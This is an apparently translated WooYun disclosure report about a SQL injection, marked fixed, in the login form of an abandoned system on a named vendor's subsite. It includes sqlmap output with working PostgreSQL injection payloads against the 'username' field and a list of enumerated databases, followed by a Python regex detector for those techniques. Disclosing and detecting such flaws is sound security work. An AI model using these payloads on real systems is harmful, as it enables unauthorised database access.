Vulnerability summary

Bug ID: wooyun-2015-0121668

Title: An abandoned system on a 新空气 subsite is vulnerable to injection

Vendor: 北京新空气软件技术有限公司

Author:

Submitted: 2015-06-22 21:45

Fixed: 2015-06-26 10:06

Disclosed: 2015-06-26 10:06

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Fixed by the vendor

Source: http://www.wooyun.org


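Vulnerability details

Disclosure status:

2015-06-22: Details reported to the vendor; awaiting vendor handling
2015-06-23: Vendor confirmed; details disclosed to the vendor only
2015-06-26: Vendor fixed the vulnerability and disclosed it voluntarily; details made public

Brief description:

**

Detailed description:

This looks like an abandoned system:
http://flow.funguide.com.cn:8080/maguscback/
It is vulnerable to POST injection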

sqlmap identified the following injection points with a total of 97 HTTP(s) requests:
---
Place: POST
Parameter: username
Type: error-based
Title: PostgreSQL AND error-based - WHERE or HAVING clause
Payload: username=TQtq' AND 9980=CAST((CHR(58)||CHR(100)||CHR(97)||CHR(100)||CHR(58))||(SELECT (CASE WHEN (9980=9980) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(112)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND 'VFFu'='VFFu&pass=
Type: stacked queries
Title: PostgreSQL > 8.1 stacked queries
Payload: username=TQtq'; SELECT PG_SLEEP(5)--&pass=
Type: AND/OR time-based blind
Title: PostgreSQL > 8.1 AND time-based blind
Payload: username=TQtq' AND 4058=(SELECT 4058 FROM PG_SLEEP(5)) AND 'Uqqj'='Uqqj&pass=
---
do you want to exploit this SQL injection? [Y/n] n
[19:00:08] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 58 times
[19:00:08] [INFO] you can find results of scanning in multiple targets mode inside the CSV file 'D:\Python27\sqlmap\output\results-06192015_0658pm.csv'
[*] shutting down at 19:00:08


Database information:

available databases [6]:
[*] magus
[*] magusc
[*] postgres
[*] rdsadmin
[*] template0
[*] template1


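I can't really find my way around PostgreSQL..

Proof of vulnerability:

RT

Remediation:

**

Copyright notice: when reposting, please credit the source @乌云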
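
The three PostgreSQL techniques in the sqlmap output above (error-based CAST/CHR, stacked queries, PG_SLEEP time-based) can be flagged in logged POST bodies. The following is an added example, not part of the original report or the vendor's code: the function names and regex signatures are assumptions, the field names `username` and `pass` come from the report, and the sample bodies are constructed.

```python
import re
from urllib.parse import parse_qs, urlencode

# One signature per PostgreSQL technique listed in the sqlmap output
# (assumed, illustrative patterns; not an exhaustive SQL injection rule set).
SIGNATURES = {
    "error-based": re.compile(
        r"cast\s*\(.*chr\s*\(\s*\d+\s*\)\s*\|\|.*\bas\s+numeric\b", re.I | re.S),
    "stacked queries": re.compile(
        r";\s*(select|insert|update|delete|drop|alter|create|copy)\b", re.I),
    "time-based": re.compile(r"\bpg_sleep\s*\(", re.I),
}


def scan_body(body):
    """Map each form parameter of a POST body to the techniques it matches."""
    findings = {}
    # parse_qs percent-decodes values, so encoded payloads are matched too.
    for param, values in parse_qs(body, keep_blank_values=True).items():
        hits = sorted(name for name, rx in SIGNATURES.items()
                      if any(rx.search(v) for v in values))
        if hits:
            findings[param] = hits
    return findings


def form(username, password=""):
    """Build a form-encoded body with the field names seen in the report."""
    return urlencode({"username": username, "pass": password})


# Constructed sample bodies: two benign logins, then one per technique
# (shortened forms of the payloads quoted in the report).
SAMPLES = [
    form("alice", "correct horse"),
    form("o'brien; jr", "select"),
    form("TQtq' AND 9980=CAST((CHR(58)||CHR(100))||(SELECT 1)::text AS NUMERIC)"
         " AND 'a'='a"),
    form("TQtq'; SELECT PG_SLEEP(5)--"),
    form("TQtq' AND 4058=(SELECT 4058 FROM PG_SLEEP(5)) AND 'Uqqj'='Uqqj"),
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(scan_body(body) or "clean", "<-", body[:60])
```

Matching is done per decoded parameter value, so a semicolon in one field and a SQL keyword in another do not combine into a false hit.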


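Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-06-23 09:31

Vendor reply:

Thanks

Latest status:

2015-06-26: The vulnerability has been fixed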